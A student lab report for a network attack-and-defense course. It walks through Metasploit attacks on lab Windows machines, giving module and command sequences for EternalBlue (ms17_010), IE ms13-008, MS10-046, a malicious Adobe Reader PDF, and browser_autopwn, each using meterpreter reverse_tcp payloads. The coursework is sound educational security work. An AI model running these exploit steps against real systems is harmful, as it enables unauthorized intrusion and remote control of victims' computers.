2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

1. 实践内容


本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1主动攻击实践,ms17_010;

1.2 针对浏览器的攻击,ms13-008MS10-046(唯一)。

1.3 针对客户端的攻击,adobe_toolbutton

1.4 成功应用任何一个辅助模块,browser autopwn

2.实验步骤及结果

1.1主动攻击实践,ms17_010


靶机: Windows Server 2008 R2 (x64)
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
使用ms17_010模块: msf > use exploit/windows/smb/ms17_010_eternalblue
设置payload:payload windows/x64/meterpreter/reverse_tcp
设置ip地址 set lhost +攻击机ip地址 、set rhost +靶机ip地址
输入exploit进行攻击
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用
攻击成功:
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

1.2 针对浏览器的攻击,ms13-008


靶机:IE 8 on Windows XP SP3
使用ms13-008模块:use exploit/windows/browser/ie_cbutton_uaf
设置payloadset payload windows/meterpreter/reverse_tcp
设置攻击机IP地址 set srvhost +攻击机ip地址
设置lhost set lhost +攻击机ip地址
exploit
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

在靶机ie 8 浏览器输入url链接
返回攻击机输入sessions -i +session id 进入meterpreter。
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用
MS10-046


在攻击机kali输入msfconsole进入控制台
使用ms10_046模块
set SRVHOST +攻击机ip
设置payload ,tcp反向回连
set LHOST +攻击机ip
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

exploit 攻击
靶机访问url链接,弹出对话框点击“允许”,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标,双击快捷方式,攻击机方显示成功建立会话。
使用sessions -i 1选择会话,攻击成功。
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

1.3 针对客户端的攻击, adobe_toolbutton


靶机:Windows XP / Adobe Reader 9
使用adobe_toolbutton模块:use exploit/windows/fileformat/adobe_toolbutton;
生成攻击文件msf.pdf;
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

将文件传给靶机;
输入back返回;
设置监听程序use exploit/multi/handler;
设置payload set payload windows/meterpreter/reverse_tcp;
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

设置攻击机IP 地址;
输入run进行攻击;
当靶机用Adobe Reader 9 打开msf文件时,攻击成功。
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

1.4 成功应用任何一个辅助模块 browser autopwn


靶机:IE 8 on Windows XP SP3
•输入use auxiliary/server/browser_autopwn
•设置 payload
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用
设置攻击机端口号
设置set LHOST 192.168.1.107
设置URIPATH
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

输入exploit进行攻击
靶机用浏览器打开url链接
输入 session -i 1成功获得权限
2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用

2 报告内容:


2.1.基础问题回答


用自己的话解释什么是exploit,payload,encode。
exploit:是攻击者利用靶机的漏洞进行攻击的一个过程。
payload:是攻击者为成功地实现对靶机的攻击,需要在靶机上执行的一段代码。
encode:是为了能够使靶机顺利的执行恶意代码,利用encode对payload进行的加工。

2.2.实践总结与体会


本次试验我先尝试攻击了中文版的win2008,winXP,win7这三个版本的系统,但是除了使用win2008可以顺利的完成第一个主动攻击外,剩下两个都没用。最后我还是换了一个英文版的winXP才顺利的完成了接下来的任务。

2.3.离实战还缺些什么技术或步骤?


我认为我现在只能攻击一下微软已经放弃打补丁的winXP,偶尔运气好还可以成功地攻击win2008和win7,等着微软什么时候放弃了给win7打补丁,我再试试能不能用现有的工具攻破win7(还是得说挑一些win7中打补丁少的)。虽说现在使用win7的还有很多,但总的来说现在已经普遍在使用win10了,而我们攻击的还只是旧版本的系统,有些跟不上时代了,更别说实战了。

上一篇:2018-2019-2 网络对抗技术 20165202 Exp5 MSF基础应用


下一篇:2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用